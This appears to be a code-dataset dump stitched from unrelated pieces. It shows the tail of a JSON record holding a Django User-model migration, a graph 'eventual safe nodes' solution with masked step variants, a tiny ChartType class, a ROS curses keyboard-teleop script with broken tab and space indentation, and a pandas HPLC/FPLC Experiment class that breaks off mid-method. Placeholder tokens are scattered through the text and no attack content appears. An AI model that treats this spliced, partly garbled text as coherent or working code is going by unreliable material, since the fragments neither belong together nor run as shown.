"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [('auth', '0007_alter_validators_add_error_messages'), (\n 'enterprise', '0002_auto_20160804_1616')]\n operations = [migrations.CreateModel(name='User', fields=[('id', models\n .AutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('password', models.CharField(max_length=128,\n verbose_name='password')), ('last_login', models.DateTimeField(\n blank=True, null=True, verbose_name='last login')), ('is_superuser',\n models.BooleanField(default=False, help_text=\n 'Designates that this user has all permissions without explicitly assigning them.'\n , verbose_name='superuser status')), ('email', models.EmailField(\n blank=True, max_length=255, unique=True, verbose_name=\n 'Электронная почта')), ('username', models.CharField(db_index=True,\n max_length=40, unique=True, verbose_name='Идентификатор')), (\n 'created_at', models.DateField(auto_now_add=True, verbose_name=\n 'Дата регистрации')), ('is_active', models.BooleanField(default=\n True, verbose_name='Активен')), ('ip', models.GenericIPAddressField\n (blank=True, null=True, verbose_name='IP адрес')), ('surname',\n models.CharField(blank=True, max_length=50, verbose_name='Фамилия')\n ), ('first_name', models.CharField(blank=True, max_length=25,\n verbose_name='Имя')), ('middle_name', models.CharField(blank=True,\n max_length=25, verbose_name='Отчество')), ('groups', models.\n ManyToManyField(blank=True, help_text=\n 'The groups this user belongs to. 
A user will get all permissions granted to each of their groups.'\n , related_name='user_set', related_query_name='user', to=\n 'auth.Group', verbose_name='groups')), ('organisation', models.\n ForeignKey(blank=True, null=True, on_delete=django.db.models.\n deletion.CASCADE, to='enterprise.Organisation', verbose_name=\n 'Сотрудник организации')), ('user_permissions', models.\n ManyToManyField(blank=True, help_text=\n 'Specific permissions for this user.', related_name='user_set',\n related_query_name='user', to='auth.Permission', verbose_name=\n 'user permissions'))], options={'verbose_name': 'Пользователь',\n 'verbose_name_plural': 'Пользователи'})]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.6 on 2016-08-04 13:16\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('auth', '0007_alter_validators_add_error_messages'),\n ('enterprise', '0002_auto_20160804_1616'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('password', models.CharField(max_length=128, verbose_name='password')),\n ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),\n ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),\n ('email', models.EmailField(blank=True, max_length=255, unique=True, verbose_name='Электронная почта')),\n ('username', models.CharField(db_index=True, max_length=40, unique=True, verbose_name='Идентификатор')),\n ('created_at', models.DateField(auto_now_add=True, verbose_name='Дата регистрации')),\n ('is_active', models.BooleanField(default=True, verbose_name='Активен')),\n ('ip', models.GenericIPAddressField(blank=True, null=True, verbose_name='IP адрес')),\n ('surname', models.CharField(blank=True, max_length=50, verbose_name='Фамилия')),\n ('first_name', models.CharField(blank=True, max_length=25, verbose_name='Имя')),\n ('middle_name', models.CharField(blank=True, max_length=25, verbose_name='Отчество')),\n ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. 
A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),\n ('organisation', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='enterprise.Organisation', verbose_name='Сотрудник организации')),\n ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),\n ],\n options={\n 'verbose_name': 'Пользователь',\n 'verbose_name_plural': 'Пользователи',\n },\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Time: O(|V| + |E|)
# Space: O(|V|)
class Solution(object):
    def eventualSafeNodes(self, graph):
        """Return all eventually-safe nodes of a directed graph, ascending.

        A node is safe when every path starting from it reaches a terminal
        node (i.e. it cannot reach a cycle).

        :type graph: List[List[int]]  (adjacency list, graph[i] = successors of i)
        :rtype: List[int]
        """
        # Three-color DFS cycle detection:
        # WHITE = unvisited, GRAY = on the current DFS stack, BLACK = proven safe.
        WHITE, GRAY, BLACK = range(3)

        def dfs(graph, node, lookup):
            # A non-white node is already resolved: safe iff BLACK.
            # Revisiting a GRAY node means we closed a cycle -> unsafe.
            if lookup[node] != WHITE:
                return lookup[node] == BLACK
            lookup[node] = GRAY
            if any(not dfs(graph, child, lookup) for child in graph[node]):
                return False
            lookup[node] = BLACK
            return True

        lookup = [WHITE] * len(graph)
        # Fix: the original used Python-2-only `xrange` (NameError on Py3)
        # and `filter` (which is a lazy iterator, not a list, on Py3).
        # A list comprehension over `range` returns a list on both versions.
        return [node for node in range(len(graph)) if dfs(graph, node, lookup)]
|
normal
|
{
"blob_id": "5c5cfcd240c8b05970dc8dff57bfbbdc98f1d100",
"index": 9838,
"step-1": "<mask token>\n",
"step-2": "class Solution(object):\n <mask token>\n",
"step-3": "class Solution(object):\n\n def eventualSafeNodes(self, graph):\n \"\"\"\n :type graph: List[List[int]]\n :rtype: List[int]\n \"\"\"\n WHITE, GRAY, BLACK = range(3)\n\n def dfs(graph, node, lookup):\n if lookup[node] != WHITE:\n return lookup[node] == BLACK\n lookup[node] = GRAY\n if any(not dfs(graph, child, lookup) for child in graph[node]):\n return False\n lookup[node] = BLACK\n return True\n lookup = [WHITE] * len(graph)\n return filter(lambda node: dfs(graph, node, lookup), xrange(len(graph))\n )\n",
"step-4": "# Time: O(|V| + |E|)\n# Space: O(|V|)\n\nclass Solution(object):\n def eventualSafeNodes(self, graph):\n \"\"\"\n :type graph: List[List[int]]\n :rtype: List[int]\n \"\"\"\n WHITE, GRAY, BLACK = range(3)\n\n def dfs(graph, node, lookup):\n if lookup[node] != WHITE:\n return lookup[node] == BLACK\n lookup[node] = GRAY\n if any(not dfs(graph, child, lookup) for child in graph[node]):\n return False\n lookup[node] = BLACK\n return True\n\n lookup = [WHITE]*len(graph)\n return filter(lambda node: dfs(graph, node, lookup), xrange(len(graph)))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class ChartType:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class ChartType:
Vanilla = 'Vanilla'
Neopolitan = 'Neopolitan'
<|reserved_special_token_1|>
class ChartType:
    """Namespace of supported chart-type identifiers.

    Each attribute holds the string value used to name that chart type.
    """

    Neopolitan = "Neopolitan"
    Vanilla = "Vanilla"
|
flexible
|
{
"blob_id": "451a36eb205a269a05e3b3d89541278633d12aaa",
"index": 9781,
"step-1": "<mask token>\n",
"step-2": "class ChartType:\n <mask token>\n <mask token>\n",
"step-3": "class ChartType:\n Vanilla = 'Vanilla'\n Neopolitan = 'Neopolitan'\n",
"step-4": "\n\nclass ChartType:\n Vanilla = \"Vanilla\"\n Neopolitan = \"Neopolitan\"\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
# Keyboard teleoperation node: reads arrow keys via curses and publishes
# drive_param (velocity, steering angle) messages until 'q' is pressed.
import rospy
from racecar_control.msg import drive_param
import curses

# Current command state: forward velocity and left steering angle.
# Units are whatever the downstream controller expects — velocity is
# clamped to +/-40 and angle to +/-0.78 rad (~45 deg); TODO confirm units.
forward = 0;
left = 0;

# Put the terminal into raw-ish keypad mode so arrow keys arrive as
# single curses key codes.
stdscr = curses.initscr()
curses.cbreak()
stdscr.keypad(1)
rospy.init_node('keyop', anonymous=True)
pub = rospy.Publisher('drive_parameters', drive_param, queue_size=10)

stdscr.refresh()

# getch() returns an int; the initial '' simply never equals ord('q').
key = ''
while key != ord('q'):
    key = stdscr.getch()
    stdscr.refresh()
    if key == curses.KEY_UP:
        # Increase forward velocity by 1, clamped to [-40, 40].
        forward = forward + 1;
	if forward >= 40:
	    forward = 40
	elif forward < -40:
	    forward = -40
        stdscr.addstr(2, 20, "Up  ")
	stdscr.addstr(2, 25, '%.2f' % forward)
	stdscr.addstr(5, 20, "    ")
    elif key == curses.KEY_DOWN:
        # Decrease forward velocity by 1, clamped to [-40, 40].
        forward = forward - 1;
	if forward >= 40:
	    forward = 40
	elif forward < -40:
	    forward = -40
        stdscr.addstr(2, 20, "Down")
	stdscr.addstr(2, 25, '%.2f' % forward)
	stdscr.addstr(5, 20, "    ")
    if key == curses.KEY_LEFT:
        # Steer further left by 0.1, clamped to [-0.78, 0.78].
	left = left + 0.1;
	if left >= 0.78:
	    left = 0.78
	elif left < -0.78:
	    left = -0.78
	stdscr.addstr(3, 20, "left")
	stdscr.addstr(3, 25, '%.2f' % left)
	stdscr.addstr(5, 20, "    ")
    elif key == curses.KEY_RIGHT:
        # Steer further right by 0.1, clamped to [-0.78, 0.78].
	left = left - 0.1;
	if left >= 0.78:
	    left = 0.78
	elif left < -0.78:
	    left = -0.78
	stdscr.addstr(3, 20, "rgt ")
	stdscr.addstr(3, 25, '%.2f' % left)
	stdscr.addstr(5, 20, "    ")
    if key == curses.KEY_DC:
        # Delete key: emergency stop — zero both commands.
        left = 0
        forward = 0
        stdscr.addstr(5, 20, "Stop")
    # Publish the current command every loop iteration (i.e. per keypress).
    msg = drive_param()
    msg.velocity = forward
    msg.angle = left
    pub.publish(msg)

# Restore normal terminal state before exiting.
curses.endwin()
|
normal
|
{
"blob_id": "fb332808890e369d1439d1dba61244a0f7b89301",
"index": 4524,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ncurses.cbreak()\nstdscr.keypad(1)\nrospy.init_node('keyop', anonymous=True)\n<mask token>\nstdscr.refresh()\n<mask token>\nwhile key != ord('q'):\n key = stdscr.getch()\n stdscr.refresh()\n if key == curses.KEY_UP:\n forward = forward + 1\n if forward >= 40:\n forward = 40\n elif forward < -40:\n forward = -40\n stdscr.addstr(2, 20, 'Up ')\n stdscr.addstr(2, 25, '%.2f' % forward)\n stdscr.addstr(5, 20, ' ')\n elif key == curses.KEY_DOWN:\n forward = forward - 1\n if forward >= 40:\n forward = 40\n elif forward < -40:\n forward = -40\n stdscr.addstr(2, 20, 'Down')\n stdscr.addstr(2, 25, '%.2f' % forward)\n stdscr.addstr(5, 20, ' ')\n if key == curses.KEY_LEFT:\n left = left + 0.1\n if left >= 0.78:\n left = 0.78\n elif left < -0.78:\n left = -0.78\n stdscr.addstr(3, 20, 'left')\n stdscr.addstr(3, 25, '%.2f' % left)\n stdscr.addstr(5, 20, ' ')\n elif key == curses.KEY_RIGHT:\n left = left - 0.1\n if left >= 0.78:\n left = 0.78\n elif left < -0.78:\n left = -0.78\n stdscr.addstr(3, 20, 'rgt ')\n stdscr.addstr(3, 25, '%.2f' % left)\n stdscr.addstr(5, 20, ' ')\n if key == curses.KEY_DC:\n left = 0\n forward = 0\n stdscr.addstr(5, 20, 'Stop')\n msg = drive_param()\n msg.velocity = forward\n msg.angle = left\n pub.publish(msg)\ncurses.endwin()\n",
"step-3": "<mask token>\nforward = 0\nleft = 0\nstdscr = curses.initscr()\ncurses.cbreak()\nstdscr.keypad(1)\nrospy.init_node('keyop', anonymous=True)\npub = rospy.Publisher('drive_parameters', drive_param, queue_size=10)\nstdscr.refresh()\nkey = ''\nwhile key != ord('q'):\n key = stdscr.getch()\n stdscr.refresh()\n if key == curses.KEY_UP:\n forward = forward + 1\n if forward >= 40:\n forward = 40\n elif forward < -40:\n forward = -40\n stdscr.addstr(2, 20, 'Up ')\n stdscr.addstr(2, 25, '%.2f' % forward)\n stdscr.addstr(5, 20, ' ')\n elif key == curses.KEY_DOWN:\n forward = forward - 1\n if forward >= 40:\n forward = 40\n elif forward < -40:\n forward = -40\n stdscr.addstr(2, 20, 'Down')\n stdscr.addstr(2, 25, '%.2f' % forward)\n stdscr.addstr(5, 20, ' ')\n if key == curses.KEY_LEFT:\n left = left + 0.1\n if left >= 0.78:\n left = 0.78\n elif left < -0.78:\n left = -0.78\n stdscr.addstr(3, 20, 'left')\n stdscr.addstr(3, 25, '%.2f' % left)\n stdscr.addstr(5, 20, ' ')\n elif key == curses.KEY_RIGHT:\n left = left - 0.1\n if left >= 0.78:\n left = 0.78\n elif left < -0.78:\n left = -0.78\n stdscr.addstr(3, 20, 'rgt ')\n stdscr.addstr(3, 25, '%.2f' % left)\n stdscr.addstr(5, 20, ' ')\n if key == curses.KEY_DC:\n left = 0\n forward = 0\n stdscr.addstr(5, 20, 'Stop')\n msg = drive_param()\n msg.velocity = forward\n msg.angle = left\n pub.publish(msg)\ncurses.endwin()\n",
"step-4": "import rospy\nfrom racecar_control.msg import drive_param\nimport curses\nforward = 0\nleft = 0\nstdscr = curses.initscr()\ncurses.cbreak()\nstdscr.keypad(1)\nrospy.init_node('keyop', anonymous=True)\npub = rospy.Publisher('drive_parameters', drive_param, queue_size=10)\nstdscr.refresh()\nkey = ''\nwhile key != ord('q'):\n key = stdscr.getch()\n stdscr.refresh()\n if key == curses.KEY_UP:\n forward = forward + 1\n if forward >= 40:\n forward = 40\n elif forward < -40:\n forward = -40\n stdscr.addstr(2, 20, 'Up ')\n stdscr.addstr(2, 25, '%.2f' % forward)\n stdscr.addstr(5, 20, ' ')\n elif key == curses.KEY_DOWN:\n forward = forward - 1\n if forward >= 40:\n forward = 40\n elif forward < -40:\n forward = -40\n stdscr.addstr(2, 20, 'Down')\n stdscr.addstr(2, 25, '%.2f' % forward)\n stdscr.addstr(5, 20, ' ')\n if key == curses.KEY_LEFT:\n left = left + 0.1\n if left >= 0.78:\n left = 0.78\n elif left < -0.78:\n left = -0.78\n stdscr.addstr(3, 20, 'left')\n stdscr.addstr(3, 25, '%.2f' % left)\n stdscr.addstr(5, 20, ' ')\n elif key == curses.KEY_RIGHT:\n left = left - 0.1\n if left >= 0.78:\n left = 0.78\n elif left < -0.78:\n left = -0.78\n stdscr.addstr(3, 20, 'rgt ')\n stdscr.addstr(3, 25, '%.2f' % left)\n stdscr.addstr(5, 20, ' ')\n if key == curses.KEY_DC:\n left = 0\n forward = 0\n stdscr.addstr(5, 20, 'Stop')\n msg = drive_param()\n msg.velocity = forward\n msg.angle = left\n pub.publish(msg)\ncurses.endwin()\n",
"step-5": "#!/usr/bin/env python\n\nimport rospy\nfrom racecar_control.msg import drive_param\nimport curses\n\nforward = 0;\nleft = 0;\n\n\nstdscr = curses.initscr()\ncurses.cbreak()\nstdscr.keypad(1)\nrospy.init_node('keyop', anonymous=True)\n\npub = rospy.Publisher('drive_parameters', drive_param, queue_size=10)\n\n\nstdscr.refresh()\n\nkey = ''\nwhile key != ord('q'):\n\n\tkey = stdscr.getch()\n\tstdscr.refresh()\n\n\tif key == curses.KEY_UP: \n\t\tforward = forward + 1;\n\t\tif forward >= 40:\n\t\t\tforward = 40\n\t\telif forward < -40:\n\t\t\tforward = -40\n\t\tstdscr.addstr(2, 20, \"Up \")\n\t\tstdscr.addstr(2, 25, '%.2f' % forward)\n\t\tstdscr.addstr(5, 20, \" \")\n\telif key == curses.KEY_DOWN:\n\t\tforward = forward - 1; \n\t\tif forward >= 40:\n\t\t\tforward = 40\n\t\telif forward < -40:\n\t\t\tforward = -40\n\t\tstdscr.addstr(2, 20, \"Down\")\n\t\tstdscr.addstr(2, 25, '%.2f' % forward)\n\t\tstdscr.addstr(5, 20, \" \")\n\tif key == curses.KEY_LEFT: \t\t\t\n\t\tleft = left + 0.1; \n\t\tif left >= 0.78:\n\t\t\tleft = 0.78\n\t\telif left < -0.78:\n\t\t\tleft = -0.78\n\t\tstdscr.addstr(3, 20, \"left\")\n\t\tstdscr.addstr(3, 25, '%.2f' % left)\n\t\tstdscr.addstr(5, 20, \" \")\n\telif key == curses.KEY_RIGHT:\n\t\tleft = left - 0.1; \n\t\tif left >= 0.78:\n\t\t\tleft = 0.78\n\t\telif left < -0.78:\n\t\t\tleft = -0.78\n\t\tstdscr.addstr(3, 20, \"rgt \")\n\t\tstdscr.addstr(3, 25, '%.2f' % left)\n\t\tstdscr.addstr(5, 20, \" \")\n\tif key == curses.KEY_DC:\n\t\tleft = 0\n\t\tforward = 0\n\t\tstdscr.addstr(5, 20, \"Stop\")\n\tmsg = drive_param()\n\tmsg.velocity = forward\n\tmsg.angle = left\n\tpub.publish(msg)\ncurses.endwin()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Experiment:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@hplc.setter
def hplc(self, df):
if isinstance(df, pd.DataFrame) or df is None:
try:
self._hplc = df.sort_values(by=['Normalization', 'Channel',
'mL'])
except AttributeError:
self._hplc = df
else:
raise TypeError('HPLC input is not a pandas dataframe')
@property
def fplc(self):
try:
return self._fplc
except AttributeError:
return None
<|reserved_special_token_0|>
@property
def wide(self):
wide = self.hplc.copy()
wide = wide.loc[wide['Normalization'] == 'Signal']
wide['Sample'] = wide['Sample'].astype(str) + ' ' + wide['Channel']
wide.drop(['Channel', 'Normalization'], axis=1)
wide = wide.pivot_table(index='Time', columns='Sample', values='Value')
return wide
def __repr__(self):
to_return = f'Experiment "{self.id}" with '
if self.hplc is not None:
to_return += 'HPLC '
if self.hplc is not None and self.fplc is not None:
to_return += 'and '
if self.fplc is not None:
to_return += 'FPLC '
if self.hplc is None and self.fplc is None:
to_return += 'no '
to_return += 'data'
return to_return
def extend_hplc(self, hplc):
if not isinstance(hplc, pd.DataFrame):
raise TypeError(
f'Tried to extend experiment hplc with {type(hplc)}')
self.hplc = pd.concat([self.hplc, hplc])
<|reserved_special_token_0|>
def jsonify(self):
if self.hplc is not None:
hplc_json = self.hplc.pivot_table(index=['mL', 'Channel',
'Time', 'Normalization'], columns='Sample', values='Value'
).reset_index().to_json()
else:
hplc_json = ''
if self.fplc is not None:
fplc_json = self.fplc.to_json()
else:
fplc_json = ''
doc = {'_id': self.id, 'version': self.version, 'hplc': hplc_json,
'fplc': fplc_json}
return doc
<|reserved_special_token_0|>
def renormalize_fplc(self, norm_range, strict):
if self.fplc is None:
raise ValueError('No FPLC data')
fplc = self.fplc.pivot(index=['mL', 'CV', 'Fraction', 'Channel',
'Sample'], columns=['Normalization'])['Value'].reset_index()
fplc = fplc.groupby(['Sample', 'Channel'], group_keys=False).apply(
lambda x: normalizer(x, norm_range, strict))
fplc = fplc.melt(id_vars=['mL', 'CV', 'Channel', 'Fraction',
'Sample'], value_vars=['Signal', 'Normalized'], var_name=
'Normalization', value_name='Value')
self.fplc = fplc
def reduce_hplc(self, num_points):
def reduction_factor(df, final_points):
reduction_factor = ceil(df.shape[0] / final_points)
return df[::reduction_factor]
try:
self.hplc = self.hplc.groupby(['Channel', 'Sample',
'Normalization'], group_keys=False, as_index=False).apply(
lambda x: reduction_factor(x, num_points))
self.hplc = self.hplc.reset_index(drop=True)
except AttributeError:
return
def rename_channels(self, channel_name_dict):
self.hplc = self.hplc.replace({'Channel': channel_name_dict})
def hplc_csv(self, outfile):
if outfile[-4:] == '.csv':
outfile = outfile[:-4]
if self.hplc is not None:
self.hplc.to_csv(outfile + '-long.csv', index=False)
self.wide.to_csv(outfile + '-wide.csv', index=True)
return outfile + '-long.csv'
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Experiment:
def __init__(self, id) ->None:
self.id = id
self.version = 4
self._hplc = None
self._fplc = None
@property
def hplc(self):
try:
return self._hplc
except AttributeError:
return None
@hplc.setter
def hplc(self, df):
if isinstance(df, pd.DataFrame) or df is None:
try:
self._hplc = df.sort_values(by=['Normalization', 'Channel',
'mL'])
except AttributeError:
self._hplc = df
else:
raise TypeError('HPLC input is not a pandas dataframe')
@property
def fplc(self):
try:
return self._fplc
except AttributeError:
return None
<|reserved_special_token_0|>
@property
def wide(self):
wide = self.hplc.copy()
wide = wide.loc[wide['Normalization'] == 'Signal']
wide['Sample'] = wide['Sample'].astype(str) + ' ' + wide['Channel']
wide.drop(['Channel', 'Normalization'], axis=1)
wide = wide.pivot_table(index='Time', columns='Sample', values='Value')
return wide
def __repr__(self):
to_return = f'Experiment "{self.id}" with '
if self.hplc is not None:
to_return += 'HPLC '
if self.hplc is not None and self.fplc is not None:
to_return += 'and '
if self.fplc is not None:
to_return += 'FPLC '
if self.hplc is None and self.fplc is None:
to_return += 'no '
to_return += 'data'
return to_return
def extend_hplc(self, hplc):
if not isinstance(hplc, pd.DataFrame):
raise TypeError(
f'Tried to extend experiment hplc with {type(hplc)}')
self.hplc = pd.concat([self.hplc, hplc])
<|reserved_special_token_0|>
def jsonify(self):
if self.hplc is not None:
hplc_json = self.hplc.pivot_table(index=['mL', 'Channel',
'Time', 'Normalization'], columns='Sample', values='Value'
).reset_index().to_json()
else:
hplc_json = ''
if self.fplc is not None:
fplc_json = self.fplc.to_json()
else:
fplc_json = ''
doc = {'_id': self.id, 'version': self.version, 'hplc': hplc_json,
'fplc': fplc_json}
return doc
def renormalize_hplc(self, norm_range, strict):
if self.hplc is None:
raise ValueError('No HPLC data')
hplc = self.hplc.pivot(index=['mL', 'Sample', 'Channel', 'Time'],
columns=['Normalization'])['Value'].reset_index()
hplc = hplc.groupby(['Sample', 'Channel'], group_keys=False).apply(
lambda x: normalizer(x, norm_range, strict))
hplc = hplc.melt(id_vars=['mL', 'Sample', 'Channel', 'Time'],
value_vars=['Signal', 'Normalized'], var_name='Normalization',
value_name='Value')
self.hplc = hplc
def renormalize_fplc(self, norm_range, strict):
if self.fplc is None:
raise ValueError('No FPLC data')
fplc = self.fplc.pivot(index=['mL', 'CV', 'Fraction', 'Channel',
'Sample'], columns=['Normalization'])['Value'].reset_index()
fplc = fplc.groupby(['Sample', 'Channel'], group_keys=False).apply(
lambda x: normalizer(x, norm_range, strict))
fplc = fplc.melt(id_vars=['mL', 'CV', 'Channel', 'Fraction',
'Sample'], value_vars=['Signal', 'Normalized'], var_name=
'Normalization', value_name='Value')
self.fplc = fplc
def reduce_hplc(self, num_points):
def reduction_factor(df, final_points):
reduction_factor = ceil(df.shape[0] / final_points)
return df[::reduction_factor]
try:
self.hplc = self.hplc.groupby(['Channel', 'Sample',
'Normalization'], group_keys=False, as_index=False).apply(
lambda x: reduction_factor(x, num_points))
self.hplc = self.hplc.reset_index(drop=True)
except AttributeError:
return
def rename_channels(self, channel_name_dict):
self.hplc = self.hplc.replace({'Channel': channel_name_dict})
def hplc_csv(self, outfile):
if outfile[-4:] == '.csv':
outfile = outfile[:-4]
if self.hplc is not None:
self.hplc.to_csv(outfile + '-long.csv', index=False)
self.wide.to_csv(outfile + '-wide.csv', index=True)
return outfile + '-long.csv'
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Experiment:
def __init__(self, id) ->None:
self.id = id
self.version = 4
self._hplc = None
self._fplc = None
@property
def hplc(self):
try:
return self._hplc
except AttributeError:
return None
@hplc.setter
def hplc(self, df):
if isinstance(df, pd.DataFrame) or df is None:
try:
self._hplc = df.sort_values(by=['Normalization', 'Channel',
'mL'])
except AttributeError:
self._hplc = df
else:
raise TypeError('HPLC input is not a pandas dataframe')
@property
def fplc(self):
try:
return self._fplc
except AttributeError:
return None
@fplc.setter
def fplc(self, df):
if isinstance(df, pd.DataFrame) or df is None:
self._fplc = df
else:
raise TypeError('FPLC input is not a pandas dataframe')
@property
def wide(self):
wide = self.hplc.copy()
wide = wide.loc[wide['Normalization'] == 'Signal']
wide['Sample'] = wide['Sample'].astype(str) + ' ' + wide['Channel']
wide.drop(['Channel', 'Normalization'], axis=1)
wide = wide.pivot_table(index='Time', columns='Sample', values='Value')
return wide
def __repr__(self):
to_return = f'Experiment "{self.id}" with '
if self.hplc is not None:
to_return += 'HPLC '
if self.hplc is not None and self.fplc is not None:
to_return += 'and '
if self.fplc is not None:
to_return += 'FPLC '
if self.hplc is None and self.fplc is None:
to_return += 'no '
to_return += 'data'
return to_return
def extend_hplc(self, hplc):
if not isinstance(hplc, pd.DataFrame):
raise TypeError(
f'Tried to extend experiment hplc with {type(hplc)}')
self.hplc = pd.concat([self.hplc, hplc])
def show_tables(self):
print('HPLC:')
print(self.hplc)
print('FPLC:')
print(self.fplc)
def jsonify(self):
if self.hplc is not None:
hplc_json = self.hplc.pivot_table(index=['mL', 'Channel',
'Time', 'Normalization'], columns='Sample', values='Value'
).reset_index().to_json()
else:
hplc_json = ''
if self.fplc is not None:
fplc_json = self.fplc.to_json()
else:
fplc_json = ''
doc = {'_id': self.id, 'version': self.version, 'hplc': hplc_json,
'fplc': fplc_json}
return doc
def renormalize_hplc(self, norm_range, strict):
if self.hplc is None:
raise ValueError('No HPLC data')
hplc = self.hplc.pivot(index=['mL', 'Sample', 'Channel', 'Time'],
columns=['Normalization'])['Value'].reset_index()
hplc = hplc.groupby(['Sample', 'Channel'], group_keys=False).apply(
lambda x: normalizer(x, norm_range, strict))
hplc = hplc.melt(id_vars=['mL', 'Sample', 'Channel', 'Time'],
value_vars=['Signal', 'Normalized'], var_name='Normalization',
value_name='Value')
self.hplc = hplc
def renormalize_fplc(self, norm_range, strict):
if self.fplc is None:
raise ValueError('No FPLC data')
fplc = self.fplc.pivot(index=['mL', 'CV', 'Fraction', 'Channel',
'Sample'], columns=['Normalization'])['Value'].reset_index()
fplc = fplc.groupby(['Sample', 'Channel'], group_keys=False).apply(
lambda x: normalizer(x, norm_range, strict))
fplc = fplc.melt(id_vars=['mL', 'CV', 'Channel', 'Fraction',
'Sample'], value_vars=['Signal', 'Normalized'], var_name=
'Normalization', value_name='Value')
self.fplc = fplc
def reduce_hplc(self, num_points):
def reduction_factor(df, final_points):
reduction_factor = ceil(df.shape[0] / final_points)
return df[::reduction_factor]
try:
self.hplc = self.hplc.groupby(['Channel', 'Sample',
'Normalization'], group_keys=False, as_index=False).apply(
lambda x: reduction_factor(x, num_points))
self.hplc = self.hplc.reset_index(drop=True)
except AttributeError:
return
def rename_channels(self, channel_name_dict):
self.hplc = self.hplc.replace({'Channel': channel_name_dict})
def hplc_csv(self, outfile):
if outfile[-4:] == '.csv':
outfile = outfile[:-4]
if self.hplc is not None:
self.hplc.to_csv(outfile + '-long.csv', index=False)
self.wide.to_csv(outfile + '-wide.csv', index=True)
return outfile + '-long.csv'
def fplc_csv(self, outfile):
if outfile[-4:] != '.csv':
outfile = outfile + '.csv'
if self.fplc is not None:
self.fplc.to_csv(outfile, index=False)
return outfile
def save_csvs(self, path):
hplc_csv = self.hplc_csv(os.path.join(path, f'{self.id}_hplc'))
fplc_csv = self.fplc_csv(os.path.join(path, f'{self.id}_fplc'))
return hplc_csv, fplc_csv
def concat_experiments(exp_list):
hplcs = []
fplcs = []
for exp in [x for x in exp_list if x.hplc is not None]:
hplc = exp.hplc
hplc['Sample'] = f'{exp.id}: ' + hplc['Sample'].astype(str)
hplcs.append(hplc)
for exp in [x for x in exp_list if x.fplc is not None]:
fplc = exp.fplc
fplc['Sample'] = exp.id
fplcs.append(fplc)
concat_exp = Experiment('concat')
try:
concat_exp.hplc = pd.concat(hplcs)
except ValueError:
pass
try:
concat_exp.fplc = pd.concat(fplcs)
except ValueError:
pass
return concat_exp
<|reserved_special_token_1|>
import pandas as pd
import os
from appia.processors.core import normalizer
from math import ceil
class Experiment:
def __init__(self, id) ->None:
self.id = id
self.version = 4
self._hplc = None
self._fplc = None
@property
def hplc(self):
try:
return self._hplc
except AttributeError:
return None
@hplc.setter
def hplc(self, df):
if isinstance(df, pd.DataFrame) or df is None:
try:
self._hplc = df.sort_values(by=['Normalization', 'Channel',
'mL'])
except AttributeError:
self._hplc = df
else:
raise TypeError('HPLC input is not a pandas dataframe')
@property
def fplc(self):
try:
return self._fplc
except AttributeError:
return None
@fplc.setter
def fplc(self, df):
if isinstance(df, pd.DataFrame) or df is None:
self._fplc = df
else:
raise TypeError('FPLC input is not a pandas dataframe')
@property
def wide(self):
wide = self.hplc.copy()
wide = wide.loc[wide['Normalization'] == 'Signal']
wide['Sample'] = wide['Sample'].astype(str) + ' ' + wide['Channel']
wide.drop(['Channel', 'Normalization'], axis=1)
wide = wide.pivot_table(index='Time', columns='Sample', values='Value')
return wide
def __repr__(self):
to_return = f'Experiment "{self.id}" with '
if self.hplc is not None:
to_return += 'HPLC '
if self.hplc is not None and self.fplc is not None:
to_return += 'and '
if self.fplc is not None:
to_return += 'FPLC '
if self.hplc is None and self.fplc is None:
to_return += 'no '
to_return += 'data'
return to_return
def extend_hplc(self, hplc):
if not isinstance(hplc, pd.DataFrame):
raise TypeError(
f'Tried to extend experiment hplc with {type(hplc)}')
self.hplc = pd.concat([self.hplc, hplc])
def show_tables(self):
print('HPLC:')
print(self.hplc)
print('FPLC:')
print(self.fplc)
def jsonify(self):
if self.hplc is not None:
hplc_json = self.hplc.pivot_table(index=['mL', 'Channel',
'Time', 'Normalization'], columns='Sample', values='Value'
).reset_index().to_json()
else:
hplc_json = ''
if self.fplc is not None:
fplc_json = self.fplc.to_json()
else:
fplc_json = ''
doc = {'_id': self.id, 'version': self.version, 'hplc': hplc_json,
'fplc': fplc_json}
return doc
def renormalize_hplc(self, norm_range, strict):
if self.hplc is None:
raise ValueError('No HPLC data')
hplc = self.hplc.pivot(index=['mL', 'Sample', 'Channel', 'Time'],
columns=['Normalization'])['Value'].reset_index()
hplc = hplc.groupby(['Sample', 'Channel'], group_keys=False).apply(
lambda x: normalizer(x, norm_range, strict))
